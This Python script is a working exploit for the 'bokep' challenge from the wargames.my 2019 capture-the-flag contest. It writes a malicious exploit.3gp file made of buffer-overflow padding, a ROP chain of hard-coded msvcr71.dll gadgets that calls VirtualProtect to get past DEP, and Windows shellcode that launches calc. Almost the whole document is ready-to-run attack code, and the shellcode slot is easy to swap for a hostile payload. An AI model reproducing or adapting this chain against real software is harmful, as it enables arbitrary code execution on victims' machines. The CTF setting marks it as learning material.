Build exploit for wargames.my 2019's bokep (from nafiez)
import struct
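# Padding that precedes the ROP chain.  The 132-byte offset is specific to the
# challenge binary and cannot be derived from this script alone.
buf = b'A' * 132

#
# virtualProtect() for rwx (msvcr71.dll – v7.10.3052.4)
# url: https://www.corelan.be/index.php/security/corelan-ropdb/#msvcr71dll_v71030524
#
# Every address below is hard-coded for that exact msvcr71.dll build loaded at
# its preferred base; any other build, or a rebased/ASLR'd module, makes the
# chain meaningless.  The register annotations follow the POP order of the
# first gadget and the arithmetic gadgets that come after it.
rop_gadgets = [
    0x7c37653d,  # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
    0xfffffdff,  # -> EAX: value to negate, will become 0x00000201 (dwSize)
    0x7c347f98,  # -> EDI: RETN (ROP NOP) [msvcr71.dll]
    0x7c3415a2,  # -> ESI: JMP [EAX] [msvcr71.dll]
    0xffffffff,  # -> EBX: seed value; the INC EBX below wraps it to 0 before ADD EBX,EAX
    0x7c376402,  # -> EBP: skip 4 bytes [msvcr71.dll]
    0x7c351e05,  # NEG EAX # RETN [msvcr71.dll]                             (EAX = 0x201)
    0x7c345255,  # INC EBX # FPATAN # RETN [msvcr71.dll]                    (EBX = 0)
    0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]  (EBX = 0x201)
    0x7c344f87,  # POP EDX # RETN [msvcr71.dll]
    0xffffffc0,  # Value to negate, will become 0x00000040
    0x7c351eb1,  # NEG EDX # RETN [msvcr71.dll]
    0x7c34d201,  # POP ECX # RETN [msvcr71.dll]
    0x7c38b001,  # &Writable location [msvcr71.dll]
    0x7c347f97,  # POP EAX # RETN [msvcr71.dll]
    0x7c37a151,  # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
    0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
    0x7c345c30,  # ptr to 'push esp # ret ' [msvcr71.dll]
    # rop chain generated with mona.py
]

# Call frame the PUSHAD gadget lays out.  The original note named this
# VirtualProtectEx with hProcess = 0xffffffff; the chain (see the gadget
# comments and the "ptr to &VirtualProtect()" entry) builds the four-argument
# VirtualProtect() instead, and the 0xffffffff is only the EBX seed.
#
#   BOOL VirtualProtect(
#       LPVOID lpAddress,      = ESP at PUSHAD time, 0x0018FF88 (buffer address)
#       SIZE_T dwSize,         = 513 (size of buffer)
#       DWORD  flNewProtect,   = 0x00000040 (PAGE_EXECUTE_READWRITE)
#       PDWORD lpflOldProtect  = 0x7C38B001
#   );
#
# stack
# -------
# start of ROP chain addr (0x0018FF44)
# after ROP, jmp to 0x0018FF8C

# Serialise the chain as consecutive little-endian DWORDs, in list order.
buf += b"".join(struct.pack("<I", gadget) for gadget in rop_gadgets)

#
# windows calc shellcode
# url: https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
#
# Third-party payload reproduced byte-for-byte; it is what the 'push esp # ret'
# gadget above lands on.
buf += b"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"

# The crafted input is written into the current directory as a side effect of
# running (or importing) this module.
with open("exploit.3gp", "wb") as fo:
    fo.write(buf)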